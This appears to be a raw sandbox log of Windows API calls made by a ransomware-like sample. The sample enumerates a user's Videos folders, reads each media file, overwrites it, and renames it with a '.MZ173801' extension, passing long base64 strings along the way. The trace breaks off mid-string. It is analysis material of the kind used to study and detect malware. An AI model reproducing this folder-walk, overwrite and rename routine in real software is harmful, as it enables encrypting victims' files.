lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.939] GetCurrentThreadId () returned 0x1358 [0119.939] GetCurrentThreadId () returned 0x1358 [0119.939] GetCurrentThreadId () returned 0x1358 [0119.939] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\Tdqlc5SA.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\tdqlc5sa.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.939] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.939] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.939] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1628f [0119.939] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.939] ReadFile (in: hFile=0x408, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x1628f, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f418*=0x1628f, lpOverlapped=0x0) returned 1 [0119.941] CloseHandle (hObject=0x408) returned 1 [0119.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\Tdqlc5SA.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\tdqlc5sa.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.944] WriteFile (in: hFile=0x408, lpBuffer=0x23bc7d0*, nNumberOfBytesToWrite=0x1628f, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23bc7d0*, lpNumberOfBytesWritten=0x19f424*=0x1628f, lpOverlapped=0x0) returned 1 [0119.946] CloseHandle (hObject=0x408) returned 1 [0119.948] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\Tdqlc5SA.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\tdqlc5sa.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\Tdqlc5SA.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\tdqlc5sa.mp4.mz173801")) returned 1 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] GetCurrentThreadId () returned 0x1358 [0119.949] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c673d0, ftCreationTime.dwHighDateTime=0x1d5ed11, ftLastAccessTime.dwLowDateTime=0x10f768e0, ftLastAccessTime.dwHighDateTime=0x1d5e26d, ftLastWriteTime.dwLowDateTime=0x10f768e0, ftLastWriteTime.dwHighDateTime=0x1d5e26d, nFileSizeHigh=0x0, nFileSizeLow=0x1628f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Tdqlc5SA.mp4", cAlternateFileName="")) returned 0 [0119.949] GetLastError () returned 0x12 [0119.949] FindClose (in: hFindFile=0xa1baf0 | out: hFindFile=0xa1baf0) returned 1 [0119.949] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0xa8c4f661, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa8c4f661, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bd58 [0119.949] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0119.949] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.949] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0xa8c4f661, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa8c4f661, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181901e0, ftCreationTime.dwHighDateTime=0x1d5e3dc, ftLastAccessTime.dwLowDateTime=0x83b1d0c0, ftLastAccessTime.dwHighDateTime=0x1d5e338, ftLastWriteTime.dwLowDateTime=0xa892e253, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3373, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="5iO4NXS5B547.mp4.MZ173801", cAlternateFileName="5IO4NX~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8727af40, ftCreationTime.dwHighDateTime=0x1d5efbd, ftLastAccessTime.dwLowDateTime=0xf3039d40, ftLastAccessTime.dwHighDateTime=0x1d5e537, ftLastWriteTime.dwLowDateTime=0xa8959183, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16d19, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="AGPyvogzOcyci-XJyAn.mkv.MZ173801", cAlternateFileName="AGPYVO~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b71860, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xca730fd0, ftLastAccessTime.dwHighDateTime=0x1d5e4cb, ftLastWriteTime.dwLowDateTime=0xa897aa56, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x172af, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="IIsaB.mkv.MZ173801", cAlternateFileName="IISABM~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41df9dd0, ftCreationTime.dwHighDateTime=0x1d5ef4a, ftLastAccessTime.dwLowDateTime=0xe70ceb30, ftLastAccessTime.dwHighDateTime=0x1d5edfd, ftLastWriteTime.dwLowDateTime=0xa8c29295, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1fba, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="lsT2a0U oQPdx7YbeML.swf.MZ173801", cAlternateFileName="LST2A0~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34620d90, ftCreationTime.dwHighDateTime=0x1d5ee60, ftLastAccessTime.dwLowDateTime=0xcd074510, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0xa8c29295, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2ac8, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="PSyIQJNrBfmiC-j.swf.MZ173801", cAlternateFileName="PSYIQJ~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c673d0, ftCreationTime.dwHighDateTime=0x1d5ed11, ftLastAccessTime.dwLowDateTime=0x10f768e0, ftLastAccessTime.dwHighDateTime=0x1d5e26d, ftLastWriteTime.dwLowDateTime=0xa8c4f661, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1628f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Tdqlc5SA.mp4.MZ173801", cAlternateFileName="TDQLC5~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c673d0, ftCreationTime.dwHighDateTime=0x1d5ed11, ftLastAccessTime.dwLowDateTime=0x10f768e0, ftLastAccessTime.dwHighDateTime=0x1d5e26d, ftLastWriteTime.dwLowDateTime=0xa8c4f661, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1628f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Tdqlc5SA.mp4.MZ173801", cAlternateFileName="TDQLC5~1.MZ1")) returned 0 [0119.950] GetLastError () returned 0x12 [0119.950] FindClose (in: hFindFile=0xa1bd58 | out: hFindFile=0xa1bd58) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd2e3c0, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x304d76b0, ftLastAccessTime.dwHighDateTime=0x1d5f084, ftLastWriteTime.dwLowDateTime=0xa8824800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d17, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OPD5PJn.avi.MZ173801", cAlternateFileName="OPD5PJ~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c67f90, ftCreationTime.dwHighDateTime=0x1d5e6dc, ftLastAccessTime.dwLowDateTime=0xd4a914f0, ftLastAccessTime.dwHighDateTime=0x1d5f023, ftLastWriteTime.dwLowDateTime=0xa8824800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa02c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="p6BEEl6x9.mp4.MZ173801", cAlternateFileName="P6BEEL~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.950] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c758920, ftCreationTime.dwHighDateTime=0x1d5f05c, ftLastAccessTime.dwLowDateTime=0x6f4cf2e0, ftLastAccessTime.dwHighDateTime=0x1d5e95a, ftLastWriteTime.dwLowDateTime=0xa88bbc30, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3273, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="SlAAbHqUUNjskp.mkv.MZ173801", cAlternateFileName="SLAABH~1.MZ1")) returned 1 [0119.950] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.950] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.951] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="uP0XF1kok-teK_dZt2-3", cAlternateFileName="UP0XF1~1")) returned 1 [0119.951] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.951] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.951] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bb98 [0119.951] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0119.951] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b1dc650, ftCreationTime.dwHighDateTime=0x1d5e417, ftLastAccessTime.dwLowDateTime=0xfef1fea0, ftLastAccessTime.dwHighDateTime=0x1d5e5f8, ftLastWriteTime.dwLowDateTime=0xfef1fea0, ftLastWriteTime.dwHighDateTime=0x1d5e5f8, nFileSizeHigh=0x0, nFileSizeLow=0x1257c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="f_4h9eckCbvZmLv.mp4", cAlternateFileName="F_4H9E~1.MP4")) returned 1 [0119.951] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0119.951] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\f_4h9eckCbvZmLv.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\f_4h9eckcbvzmlv.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b1dc650, ftCreationTime.dwHighDateTime=0x1d5e417, ftLastAccessTime.dwLowDateTime=0xfef1fea0, ftLastAccessTime.dwHighDateTime=0x1d5e5f8, ftLastWriteTime.dwLowDateTime=0xfef1fea0, ftLastWriteTime.dwHighDateTime=0x1d5e5f8, nFileSizeHigh=0x0, nFileSizeLow=0x1257c)) returned 1 [0119.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1M